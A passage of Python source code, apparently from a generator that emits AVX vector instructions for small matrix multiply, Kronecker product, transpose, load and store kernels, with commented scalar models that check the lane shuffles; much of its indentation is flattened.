va0 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), [tuple(range(nu))])
va1 = mm256LoadGd(Pointer(src0[s0L.of(1),s0R.of(0)]), [tuple(range(nu))])
va2 = mm256LoadGd(Pointer(src0[s0L.of(2),s0R.of(0)]), [tuple(range(nu))])
va3 = mm256LoadGd(Pointer(src0[s0L.of(3),s0R.of(0)]), [tuple(range(nu))])
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc0 = Pointer(dst[dL.of(0),dR.of(0)])
pc1 = Pointer(dst[dL.of(1),dR.of(0)])
pc2 = Pointer(dst[dL.of(2),dR.of(0)])
pc3 = Pointer(dst[dL.of(3),dR.of(0)])
instr0 = mm256StoreGd(mm256MulPd(va0, vb), pc0, range(nu))
instr1 = mm256StoreGd(mm256MulPd(va1, vb), pc1, range(nu))
instr2 = mm256StoreGd(mm256MulPd(va2, vb), pc2, range(nu))
instr3 = mm256StoreGd(mm256MulPd(va3, vb), pc3, range(nu))
instructions += [ instr0, instr1, instr2, instr3 ]
else:
if N == 1:
va0 = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
va1 = mm256LoadGd(Pointer(src0[s0L.of(1),s0R.of(0)]), range(nu))
va2 = mm256LoadGd(Pointer(src0[s0L.of(2),s0R.of(0)]), range(nu))
va3 = mm256LoadGd(Pointer(src0[s0L.of(3),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
mul0 = mm256MulPd(va0, vb)
mul1 = mm256MulPd(va1, vb)
mul2 = mm256MulPd(va2, vb)
mul3 = mm256MulPd(va3, vb)
hadd0 = mm256HaddPd(mul0, mul1)
hadd1 = mm256HaddPd(mul2, mul3)
vper = mm256Permute2f128Pd(hadd0, hadd1, [0,0,1,0,0,0,0,1])
vble = mm256BlendPd(hadd0, hadd1, [1,1,0,0])
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256AddPd(vper, vble), pc, range(nu))
instructions += [ instr ]
else:
vb0 = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
vb1 = mm256LoadGd(Pointer(src1[s1L.of(1),s1R.of(0)]), range(nu))
vb2 = mm256LoadGd(Pointer(src1[s1L.of(2),s1R.of(0)]), range(nu))
vb3 = mm256LoadGd(Pointer(src1[s1L.of(3),s1R.of(0)]), range(nu))
for i in range(nu):
vai0 = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(0)]), [tuple(range(nu))])
vai1 = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(1)]), [tuple(range(nu))])
vai2 = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(2)]), [tuple(range(nu))])
vai3 = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(3)]), [tuple(range(nu))])
mul0 = mm256MulPd(vai0, vb0)
mul1 = mm256MulPd(vai1, vb1)
add0 = mm256AddPd(mul0, mul1)
mul2 = mm256MulPd(vai2, vb2)
mul3 = mm256MulPd(vai3, vb3)
add1 = mm256AddPd(mul2, mul3)
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256AddPd(add0, add1), pc, range(nu))
instructions += [ instr ]
return instructions
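# The M>1, N==1 branch of Mul above reduces four row products with a
# hadd/permute/blend tree. The scalar model below (hypothetical helper names
# standing in for the AVX intrinsics) checks that data movement; the bit
# lists used by the generator read MSB-first as imm8 values, e.g.
# [0,0,1,0,0,0,0,1] -> 0x21 and [1,1,0,0] -> 0b1100.

```python
def haddpd(a, b):
    # _mm256_hadd_pd: per 128-bit lane, adjacent pairwise sums
    return [a[0] + a[1], b[0] + b[1], a[2] + a[3], b[2] + b[3]]

def permute2f128(a, b, imm):
    # _mm256_permute2f128_pd: each result lane selects one source lane
    lanes = [a[0:2], a[2:4], b[0:2], b[2:4]]
    return lanes[imm & 0x3] + lanes[(imm >> 4) & 0x3]

def blendpd(a, b, imm):
    # _mm256_blend_pd: bit i set -> take element i from b
    return [b[i] if (imm >> i) & 1 else a[i] for i in range(4)]

A = [[1.0, 2.0, 3.0, 4.0],
     [5.0, 6.0, 7.0, 8.0],
     [9.0, 10.0, 11.0, 12.0],
     [13.0, 14.0, 15.0, 16.0]]
b = [1.0, -1.0, 2.0, 0.5]
muls = [[A[i][j] * b[j] for j in range(4)] for i in range(4)]
hadd0 = haddpd(muls[0], muls[1])
hadd1 = haddpd(muls[2], muls[3])
vper = permute2f128(hadd0, hadd1, 0x21)  # mask list [0,0,1,0,0,0,0,1]
vble = blendpd(hadd0, hadd1, 0b1100)     # mask list [1,1,0,0]
y = [vper[i] + vble[i] for i in range(4)]
```

# y holds the four dot products A[i] . b, i.e. the 4x4 * 4x1 result vector.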
def Kro(self, s0Params, s1Params, dParams, opts):
nu = 4
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
oM, oK, oN, oP = s0Params['M'], s0Params['N'], s1Params['M'], s1Params['N']
M, K, N, P = s0Params['nuMM'], s0Params['nuMN'], s1Params['nuMM'], s1Params['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(K) + " Kro " + str(N) + "x" + str(P)) ]
if oM*oK*oN*oP == 1:
pc = Pointer(dst[dL.of(0),dR.of(0)])
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
instr = mm256StoreGd(mm256MulPd(va, vb), pc, range(nu))
instructions += [ instr ]
elif oM*oK == 1:
if s0Params['bcast']:
dup = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
else:
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
repva = mm256Permute2f128Pd(va, va, [0,0,0,0,0,0,0,0]) #Need to replicate on the 2nd lane
dup = mm256ShufflePd(repva, repva, (0,0,0,0))
if N*P == nu:
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256MulPd(dup, vb), pc, range(nu))
instructions += [ instr ]
else:
for i in range(nu):
vb = mm256LoadGd(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256MulPd(dup, vb), pc, range(nu))
instructions += [ instr ]
else:
if s1Params['bcast']:
dup = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
else:
vb = mm256LoadGd(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
repvb = mm256Permute2f128Pd(vb, vb, [0,0,0,0,0,0,0,0]) #Need to replicate on the 2nd lane
dup = mm256ShufflePd(repvb, repvb, (0,0,0,0))
if M*K == nu:
va = mm256LoadGd(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(mm256MulPd(va, dup), pc, range(nu))
instructions += [ instr ]
else:
for i in range(nu):
va = mm256LoadGd(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGd(mm256MulPd(va, dup), pc, range(nu))
instructions += [ instr ]
return instructions
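# When the scalar operand of Kro is not pre-broadcast, the generator emits a
# permute2f128 with mask [0]*8 (imm 0x00) to copy lane 0 into both lanes,
# followed by an in-lane shuffle with selector (0,0,0,0). A scalar sketch of
# that broadcast for the Pd variants (hypothetical helper names):

```python
def permute2f128(a, b, imm):
    # _mm256_permute2f128_pd: each result lane selects one source lane
    lanes = [a[0:2], a[2:4], b[0:2], b[2:4]]
    return lanes[imm & 0x3] + lanes[(imm >> 4) & 0x3]

def shufpd(a, b, imm):
    # _mm256_shuffle_pd: per lane, pick a[bit] then b[bit]
    return [a[imm & 1], b[(imm >> 1) & 1],
            a[2 + ((imm >> 2) & 1)], b[2 + ((imm >> 3) & 1)]]

va = [3.5, -1.0, 2.0, 7.0]          # scalar of interest sits in element 0
repva = permute2f128(va, va, 0x00)  # lane 0 replicated into both lanes
dup = shufpd(repva, repva, 0)       # element 0 duplicated within each lane
```

# dup now carries the scalar va[0] in all four slots, ready for mm256MulPd.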
def T(self, sParams, dParams, opts):
nu = 4
src, dst = sParams['nuM'], dParams['nuM']
sL, sR = sParams['nuML'], sParams['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: (" + str(N) + "x" + str(M) + ")^T") ]
if M*N == nu:
va = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGd(va, pc, range(nu))
instructions += [ instr ]
else:
va0 = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
va1 = mm256LoadGd(Pointer(src[sL.of(1),sR.of(0)]), range(nu))
va2 = mm256LoadGd(Pointer(src[sL.of(2),sR.of(0)]), range(nu))
va3 = mm256LoadGd(Pointer(src[sL.of(3),sR.of(0)]), range(nu))
tmp0 = mm256UnpackloPd(va0, va1)
tmp1 = mm256UnpackloPd(va2, va3)
tmp2 = mm256UnpackhiPd(va0, va1)
tmp3 = mm256UnpackhiPd(va2, va3)
col0 = mm256Permute2f128Pd(tmp0, tmp1, [0,0,1,0,0,0,0,0])
col1 = mm256Permute2f128Pd(tmp2, tmp3, [0,0,1,0,0,0,0,0])
col2 = mm256Permute2f128Pd(tmp0, tmp1, [0,0,1,1,0,0,0,1])
col3 = mm256Permute2f128Pd(tmp2, tmp3, [0,0,1,1,0,0,0,1])
pc0 = Pointer(dst[dL.of(0),dR.of(0)])
pc1 = Pointer(dst[dL.of(1),dR.of(0)])
pc2 = Pointer(dst[dL.of(2),dR.of(0)])
pc3 = Pointer(dst[dL.of(3),dR.of(0)])
instr0 = mm256StoreGd(col0, pc0, range(nu))
instr1 = mm256StoreGd(col1, pc1, range(nu))
instr2 = mm256StoreGd(col2, pc2, range(nu))
instr3 = mm256StoreGd(col3, pc3, range(nu))
instructions += [ instr0, instr1, instr2, instr3 ]
return instructions
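# The unpacklo/unpackhi + permute2f128 sequence in T above is the standard
# AVX 4x4 double transpose. A scalar model to check the lane movement
# (helper names are illustrative; the masks [0,0,1,0,0,0,0,0] and
# [0,0,1,1,0,0,0,1] read MSB-first as imm8 0x20 and 0x31):

```python
def unpacklo_pd(a, b):
    # _mm256_unpacklo_pd: low element of each 128-bit lane, interleaved
    return [a[0], b[0], a[2], b[2]]

def unpackhi_pd(a, b):
    # _mm256_unpackhi_pd: high element of each 128-bit lane, interleaved
    return [a[1], b[1], a[3], b[3]]

def permute2f128(a, b, imm):
    # _mm256_permute2f128_pd: each result lane selects one source lane
    lanes = [a[0:2], a[2:4], b[0:2], b[2:4]]
    return lanes[imm & 0x3] + lanes[(imm >> 4) & 0x3]

rows = [[4.0 * i + j for j in range(4)] for i in range(4)]
tmp0 = unpacklo_pd(rows[0], rows[1])
tmp1 = unpacklo_pd(rows[2], rows[3])
tmp2 = unpackhi_pd(rows[0], rows[1])
tmp3 = unpackhi_pd(rows[2], rows[3])
cols = [permute2f128(tmp0, tmp1, 0x20),
        permute2f128(tmp2, tmp3, 0x20),
        permute2f128(tmp0, tmp1, 0x31),
        permute2f128(tmp2, tmp3, 0x31)]
```

# cols[j] is column j of the input, i.e. row j of the transpose.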
class _Dbl4Storer(Storer):
def __init__(self):
super(_Dbl4Storer, self).__init__()
def storeMatrix(self, mParams):
src, dst = mParams['nuM'], mParams['m']
sL, sR = mParams['nuML'], mParams['nuMR']
dL, dR = mParams['mL'], mParams['mR']
M, N = mParams['M'], mParams['N']
isCompact = mParams['compact']
mStruct, mAccess = mParams['struct'], mParams['access']
instructions = []
nu = 4
instructions.append(Comment('AVX Storer:'))
if Matrix.testGeneral(mStruct, mAccess, M, N):
if M == 1 and N == 1:
pc = AddressOf(sa(dst[dL.of(0),dR.of(0)]))
va = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
instr = mm256StoreGd(va, pc,[0])
instructions += [ instr ]
elif (N == 1 and ((M <= nu and not isCompact) or (M < nu and isCompact))) or (M == 1 and N < nu):
va = mm256LoadGd(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
horizontal = M==1
instr = mm256StoreGd(va, pc, range(max(M,N)), isCompact=isCompact, horizontal=horizontal)
instructions += [ instr ]
elif mAccess.intersect(Map("{[i,j]->[i,j]}")) == mAccess and ((M < nu and N < nu) or (M == nu and N > 1 and N < nu) or (M > 1 and M < nu and N == nu)):
pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(M) ]
vas = [ mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), range(nu)) for i in range(M) ]
instrs = [ mm256StoreGd(vas[i], pcs[i], range(N)) for i in range(M) ]
instructions += instrs
elif Symmetric.testLower(mStruct, mAccess, M, N):
#LSymm
nuvs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), [0, 1, 2, 3], isCompact, zeromask=range(i+1, 4)) for i in range(M)]
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(M)]
comm = Comment("4x4 -> %dx%d - %s" % (M, N, 'LowSymm'))
instrs = [mm256StoreGd(nuvs[i], pcs[i], range(i+1), isCompact) for i in range(M)]
instructions.extend([comm] + instrs)
elif Symmetric.testUpper(mStruct, mAccess, M, N):
#USymm
nuvs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), [0, 1, 2, 3], isCompact, zeromask=range(0, i)) for i in range(M)]
pcs = [Pointer(dst[dL.of(i),dR.of(i)]) for i in range(M)]
comm = Comment("4x4 -> %dx%d - %s" % (M, N, 'UpSymm'))
instrs = [mm256StoreGd(nuvs[i], pcs[i], range(i,M), isCompact) for i in range(M)]
instructions.extend([comm] + instrs)
elif LowerTriangular.test(mStruct, mAccess, M, N):
#LowerTriang
nuvs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), [0, 1, 2, 3], isCompact, zeromask=range(i+1, 4)) for i in range(M)]
pcs = [Pointer(dst[dL.of(i),dR.of(0)]) for i in range(M)]
comm = Comment("4x4 -> %dx%d - %s" % (M, N, 'LowTriang'))
instrs = [mm256StoreGd(nuvs[i], pcs[i], range(i+1), isCompact) for i in range(M)]
instructions.extend([comm] + instrs)
elif UpperTriangular.test(mStruct, mAccess, M, N):
#UpperTriang
nuvs = [mm256LoadGd(Pointer(src[sL.of(i),sR.of(0)]), [0, 1, 2, 3], isCompact, zeromask=range(0, i)) for i in range(M)]
pcs = [Pointer(dst[dL.of(i),dR.of(i)]) for i in range(M)]
comm = Comment("4x4 -> %dx%d - %s" % (M, N, 'UpTriang'))
instrs = [mm256StoreGd(nuvs[i], pcs[i], range(i,M), isCompact) for i in range(M)]
instructions.extend([comm] + instrs)
for i in instructions:
i.bounds.update(mParams['bounds'])
return instructions
class _Flt8Loader(Loader):
def __init__(self):
super(_Flt8Loader, self).__init__()
def loadMatrix(self, mParams):
nu=8
src, dst = mParams['m'], mParams['nuM']
sL, sR = mParams['mL'], mParams['mR']
dL, dR = mParams['nuML'], mParams['nuMR']
M, N = mParams['M'], mParams['N']
nuMM, nuMN = mParams['nuMM'], mParams['nuMN']
isCompact = mParams['compact']
instructions = [ ]
if M == 1 and N == 1:
pc = Pointer(dst[dL.of(0),dR.of(0)])
pa = AddressOf(sa(src[sL.of(0),sR.of(0)]))
if mParams['bcast']:
va = mm256LoadGs(pa, [tuple(range(nu))])
else:
va = mm256LoadGs(pa, [0])
instr = mm256StoreGs(va, pc, range(nu))
instructions += [ Comment(str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ instr ]
elif (N == 1 and ((M <= nu and not isCompact) or (M < nu and isCompact))) or (M == 1 and N < nu):
pc = Pointer(dst[dL.of(0),dR.of(0)])
horizontal = M==1
pa = Pointer(src[sL.of(0),sR.of(0)])
va = mm256LoadGs(pa, range(max(M,N)), isCompact=isCompact, horizontal=horizontal)
instr = mm256StoreGs(va, pc, range(nu))
instructions += [ Comment(str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ instr ]
elif (M < nu and N < nu) or (M == nu and N > 1 and N < nu) or (M > 1 and M < nu and N == nu):
pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu) ]
pas = [ Pointer(src[sL.of(i),sR.of(0)]) for i in range(M) ]
vas = [ mm256LoadGs(pas[i], range(N)) for i in range(M) ]
instructions += [ Comment(str(M) + "x" + str(N) + " -> " + str(nuMM) + "x" + str(nuMN)) ]
instructions += [ mm256StoreGs(vas[i], pcs[i], range(nu)) for i in range(M) ]
instructions += [ mm256StoreGs(mm256SetzeroPs(), pcs[i], range(nu)) for i in range(M,nu) ]
return instructions
class _Flt8BLAC(object):
def __init__(self):
super(_Flt8BLAC, self).__init__()
def Add(self, s0Params, s1Params, dParams, opts):
nu = 8
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, N = dParams['nuMM'], dParams['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(N) + " + " + str(M) + "x" + str(N)) ]
if M*N == nu:
va = mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGs(mm256AddPs(va, vb), pc, range(nu))
instructions += [ instr ]
elif M == nu and N == nu:
for i in range(M):
va = mm256LoadGs(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu))
vb = mm256LoadGs(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGs(mm256AddPs(va, vb), pc, range(nu))
instructions += [ instr ]
return instructions
def Mul(self, s0Params, s1Params, dParams, opts):
nu = 8
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
M, K, N = s0Params['nuMM'], s0Params['nuMN'], s1Params['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(K) + " * " + str(K) + "x" + str(N)) ]
if M == 1:
if N == 1:
va = mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
vmul = mm256MulPs(va, vb)
vper = mm256Permute2f128Ps(vmul, vmul, [1,0,0,0,0,0,0,1])
vadd0 = mm256AddPs(vmul, vper)
vshu0 = mm256ShufflePs(vadd0, mm256SetzeroPs(), [0,0,3,2])
vadd1 = mm256AddPs(vadd0, vshu0)
vble1 = mm256BlendPs(vadd1, mm256SetzeroPs(), [1]*7 + [0])
vshu1 = mm256ShufflePs(vadd1, mm256SetzeroPs(), [0,0,2,1])
vadd2 = mm256AddPs(vble1, vshu1)
instr = mm256StoreGs(vadd2, pc, range(nu))
instructions += [ instr ]
else:
vbs = [ mm256LoadGs(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu)) for i in range(nu) ]
va0s = [ mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(i)]), [tuple(range(nu))]) for i in range(nu) ]
adds = []
for i in range(0,nu,2):
mul0 = mm256MulPs(va0s[i], vbs[i])
mul1 = mm256MulPs(va0s[i+1], vbs[i+1])
adds.append( mm256AddPs(mul0, mul1) )
t0 = mm256AddPs(adds[0], adds[1])
t1 = mm256AddPs(adds[2], adds[3])
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGs(mm256AddPs(t0, t1), pc, range(nu))
instructions += [ instr ]
else:
if K == 1:
vas = [ mm256LoadGs(Pointer(src0[s0L.of(i),s0R.of(0)]), [tuple(range(nu))]) for i in range(nu) ]
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu) ]
instrs = [ mm256StoreGs(mm256MulPs(vas[i], vb), pcs[i], range(nu)) for i in range(nu) ]
instructions += instrs
else:
if N == 1:
vas = [ mm256LoadGs(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu)) for i in range(nu) ]
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
muls = [ mm256MulPs(vas[i], vb) for i in range(nu) ]
lane0s = [ mm256Permute2f128Ps(muls[i], muls[4+i], [0,0,1,0,0,0,0,0]) for i in range(nu//2) ]
lane1s = [ mm256Permute2f128Ps(muls[i], muls[4+i], [0,0,1,1,0,0,0,1]) for i in range(nu//2) ]
t0s = [ mm256HaddPs(lane0s[i], lane1s[i]) for i in range(nu//2) ]
t1s = [ mm256HaddPs(t0s[i], t0s[i+1]) for i in range(0,nu//2,2) ]
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGs(mm256HaddPs(t1s[0], t1s[1]), pc, range(nu))
instructions += [ instr ]
else:
vbs = [ mm256LoadGs(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu)) for i in range(nu) ]
for i in range(nu):
vais = [ mm256LoadGs(Pointer(src0[s0L.of(i),s0R.of(j)]), [tuple(range(nu))]) for j in range(nu) ]
adds = []
for j in range(0,nu,2):
mul0 = mm256MulPs(vais[j], vbs[j])
mul1 = mm256MulPs(vais[j+1], vbs[j+1])
adds.append( mm256AddPs(mul0, mul1) )
t0 = mm256AddPs(adds[0], adds[1])
t1 = mm256AddPs(adds[2], adds[3])
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGs(mm256AddPs(t0, t1), pc, range(nu))
instructions += [ instr ]
return instructions
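# The N==1 branch of the 8-float Mul splits each row product across lanes
# with permute2f128 (masks 0x20 / 0x31, MSB-first bit lists) and then
# collapses it with a three-level haddps tree. A scalar model of that
# reduction (illustrative helper names):

```python
def haddps(a, b):
    # _mm256_hadd_ps: per 128-bit lane, [a0+a1, a2+a3, b0+b1, b2+b3]
    def lane(x, y):
        return [x[0] + x[1], x[2] + x[3], y[0] + y[1], y[2] + y[3]]
    return lane(a[0:4], b[0:4]) + lane(a[4:8], b[4:8])

def permute2f128(a, b, imm):
    # _mm256_permute2f128_ps: each result lane selects one source lane
    lanes = [a[0:4], a[4:8], b[0:4], b[4:8]]
    return lanes[imm & 0x3] + lanes[(imm >> 4) & 0x3]

A = [[float(8 * i + j + 1) for j in range(8)] for i in range(8)]
b = [1.0, -1.0, 0.5, 2.0, 1.0, 0.0, -2.0, 4.0]
muls = [[A[i][j] * b[j] for j in range(8)] for i in range(8)]
# pair rows i and i+4: low halves in one vector, high halves in another
lane0s = [permute2f128(muls[i], muls[4 + i], 0x20) for i in range(4)]
lane1s = [permute2f128(muls[i], muls[4 + i], 0x31) for i in range(4)]
t0s = [haddps(lane0s[i], lane1s[i]) for i in range(4)]
t1s = [haddps(t0s[i], t0s[i + 1]) for i in (0, 2)]
y = haddps(t1s[0], t1s[1])
```

# y holds the eight dot products A[i] . b, i.e. the 8x8 * 8x1 result vector.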
def Kro(self, s0Params, s1Params, dParams, opts):
nu = 8
src0, src1, dst = s0Params['nuM'], s1Params['nuM'], dParams['nuM']
s0L, s0R = s0Params['nuML'], s0Params['nuMR']
s1L, s1R = s1Params['nuML'], s1Params['nuMR']
dL, dR = dParams['nuML'], dParams['nuMR']
oM, oK, oN, oP = s0Params['M'], s0Params['N'], s1Params['M'], s1Params['N']
M, K, N, P = s0Params['nuMM'], s0Params['nuMN'], s1Params['nuMM'], s1Params['nuMN']
instructions = []
instructions += [ Comment(str(nu) + "-BLAC: " + str(M) + "x" + str(K) + " Kro " + str(N) + "x" + str(P)) ]
if oM*oK*oN*oP == 1:
pc = Pointer(dst[dL.of(0),dR.of(0)])
va = mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
instr = mm256StoreGs(mm256MulPs(va, vb), pc, range(nu))
instructions += [ instr ]
elif oM*oK == 1:
if s0Params['bcast']:
dup = mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
else:
va = mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
repva = mm256Permute2f128Ps(va, va, [0,0,0,0,0,0,0,0]) #Need to replicate on the 2nd lane
dup = mm256ShufflePs(repva, repva, (0,0,0,0))
if N*P == nu:
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGs(mm256MulPs(dup, vb), pc, range(nu))
instructions += [ instr ]
else:
for i in range(nu):
vb = mm256LoadGs(Pointer(src1[s1L.of(i),s1R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGs(mm256MulPs(dup, vb), pc, range(nu))
instructions += [ instr ]
else:
if s1Params['bcast']:
dup = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
else:
vb = mm256LoadGs(Pointer(src1[s1L.of(0),s1R.of(0)]), range(nu))
repvb = mm256Permute2f128Ps(vb, vb, [0,0,0,0,0,0,0,0]) #Need to replicate on the 2nd lane
dup = mm256ShufflePs(repvb, repvb, (0,0,0,0))
if M*K == nu:
va = mm256LoadGs(Pointer(src0[s0L.of(0),s0R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(0),dR.of(0)])
instr = mm256StoreGs(mm256MulPs(va, dup), pc, range(nu))
instructions += [ instr ]
else:
for i in range(nu):
va = mm256LoadGs(Pointer(src0[s0L.of(i),s0R.of(0)]), range(nu))
pc = Pointer(dst[dL.of(i),dR.of(0)])
instr = mm256StoreGs(mm256MulPs(va, dup), pc, range(nu))
instructions += [ instr ]
return instructions
    def T(self, sParams, dParams, opts):
        nu = 8
        src, dst = sParams['nuM'], dParams['nuM']
        sL, sR = sParams['nuML'], sParams['nuMR']
        dL, dR = dParams['nuML'], dParams['nuMR']
        M, N = dParams['nuMM'], dParams['nuMN']
        instructions = []
        instructions += [ Comment(str(nu) + "-BLAC: (" + str(N) + "x" + str(M) + ")^T") ]
        if M*N == nu:
            va = mm256LoadGs(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
            pc = Pointer(dst[dL.of(0),dR.of(0)])
            instr = mm256StoreGs(va, pc, range(nu))
            instructions += [ instr ]
        else:
            vas = [ mm256LoadGs(Pointer(src[sL.of(i),sR.of(0)]), range(nu)) for i in range(nu) ]
            unplos = [ mm256UnpackloPs(vas[i], vas[i+1]) for i in range(0,nu,2) ]
            unphis = [ mm256UnpackhiPs(vas[i], vas[i+1]) for i in range(0,nu,2) ]
            trow0 = mm256ShufflePs(unplos[0], unplos[1], (1,0,1,0))
            trow1 = mm256ShufflePs(unplos[0], unplos[1], (3,2,3,2))
            trow2 = mm256ShufflePs(unphis[0], unphis[1], (1,0,1,0))
            trow3 = mm256ShufflePs(unphis[0], unphis[1], (3,2,3,2))
            trow4 = mm256ShufflePs(unplos[2], unplos[3], (1,0,1,0))
            trow5 = mm256ShufflePs(unplos[2], unplos[3], (3,2,3,2))
            trow6 = mm256ShufflePs(unphis[2], unphis[3], (1,0,1,0))
            trow7 = mm256ShufflePs(unphis[2], unphis[3], (3,2,3,2))
            newrows = [ mm256Permute2f128Ps(trow0, trow4, [0,0,1,0,0,0,0,0]) ]
            newrows.append( mm256Permute2f128Ps(trow1, trow5, [0,0,1,0,0,0,0,0]) )
            newrows.append( mm256Permute2f128Ps(trow2, trow6, [0,0,1,0,0,0,0,0]) )
            newrows.append( mm256Permute2f128Ps(trow3, trow7, [0,0,1,0,0,0,0,0]) )
            newrows.append( mm256Permute2f128Ps(trow0, trow4, [0,0,1,1,0,0,0,1]) )
            newrows.append( mm256Permute2f128Ps(trow1, trow5, [0,0,1,1,0,0,0,1]) )
            newrows.append( mm256Permute2f128Ps(trow2, trow6, [0,0,1,1,0,0,0,1]) )
            newrows.append( mm256Permute2f128Ps(trow3, trow7, [0,0,1,1,0,0,0,1]) )
            pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(nu) ]
            instructions += [ mm256StoreGs(newrows[i], pcs[i], range(nu)) for i in range(nu) ]
        return instructions
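The unpacklo/unpackhi, shuffle, and permute2f128 sequence that `T` emits above is the standard 8x8 single-precision AVX transpose; the 8-entry bit lists are the immediate written MSB-first ([0,0,1,0,0,0,0,0] = 0x20, [0,0,1,1,0,0,0,1] = 0x31). As a sanity check on the index math, the lane semantics can be modeled in plain Python (the helper names below are illustrative stand-ins, not part of this module):

```python
def unpacklo(a, b):  # _mm256_unpacklo_ps: interleave low halves of each 128-bit lane
    return [a[0], b[0], a[1], b[1], a[4], b[4], a[5], b[5]]

def unpackhi(a, b):  # _mm256_unpackhi_ps: interleave high halves of each 128-bit lane
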